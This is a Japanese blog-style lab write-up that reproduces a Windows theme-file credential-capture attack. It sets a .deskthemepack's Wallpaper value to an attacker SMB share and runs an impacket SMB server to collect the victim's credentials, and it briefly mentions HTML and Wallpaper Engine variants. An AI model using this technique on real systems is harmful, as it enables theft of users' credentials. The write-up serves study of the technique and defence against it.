最近、嘶吼(シーホウ)が投稿した記事を見ました。
興味が湧いたので、試してみることにしました。記事に書かれている情報に基づいて再現し、再現過程を記録します。
#
再現過程
攻撃マシン:kali 192.168.233.128
ターゲットマシン:win server 2012 192.168.233.130
win10 192.168.233.1
まず、悪意のあるテーマパックを作成します。
デスクトップを右クリックし、テーマに移動し、適用済みのテーマを選択し、テーマファイルをエクスポートするために右クリックします。
ファイルを deskthemepack 拡張子でエクスポートします。圧縮ファイルを使用して、テーマファイルを開きます。
テキストエディタでテーマファイルを開き、[Control Panel\Desktop] セクションの下に移動し、Wallpaper パラメータを見つけます。ここに場所が指定されています。ここでは壁紙の参照アドレスが規定されており、ローカルファイルまたはネットワークアドレスのいずれかを指定できます。また、ネットワークアドレスはさまざまなプロトコルをサポートしています。したがって、これは実際には脆弱性ではないと言えますが、Microsoft が修正を拒否するのは正常です。
Wallpaper の値を SMB 共有ファイル 192.168.233.128\a\shell.png (攻撃者が開いている SMB サービス)に設定します。
保存してください。kali で SMB サービスを開始します。impacket を使用して、サービスを迅速に構築できます。impacket の具体的な使用法については、自分で調べてください。
impacket-smbserver a pwd
失敗した場合は、sudo を追加することを忘れないでください。
サービスの開始に成功したら、被害者の操作をシミュレートします。
テーマファイルをダブルクリックしてテーマをインストールすると、kali 内でユーザーの資格情報が受信されます。
注意:SMB サーバーは正常に動作している必要があります。そうでない場合、ターゲットマシンはデスクトップに応答しません。
これが攻撃の全体的な流れです。実際の本質的な考え方は、認証が必要ない機能でパスワードなしで SMB リソースにアクセスすると、システム自体の資格情報がデフォルトで渡されるというものです。この考え方を拡大すれば、他の方法もあります。例えば、近年人気のある動的壁紙ソフトウェアである wallpaper engine にも外部リソースへのアクセス機能があります。
これも利用できます。
他には何がありますか?実際には HTML も利用できます。ちょうど win server にはテーマという機能がないため、HTML を利用して攻撃することができます。
悪意のある HTML ファイルにアクセスします。
SMB サーバーも同様に資格情報を受信します。
これで 2 つのターゲットマシンが攻撃されました。
最後に、攻撃手法は他にもたくさんあります。リモートリソースで自動的にアクセスするものであれば、この攻撃を行うことができます。ただし、実験中に問題が発生したことに気付きました。445 ポートは、ネットワークプロバイダのレベルでブロックされていました。それは永遠の青いエクスプロイトを防御するためだと言われています。また、win システムは非標準の SMB アクセスをサポートしていないため、この手法はおそらく国内でしか使用できないでしょう。海外の環境では再現が面倒なので、試していません。
END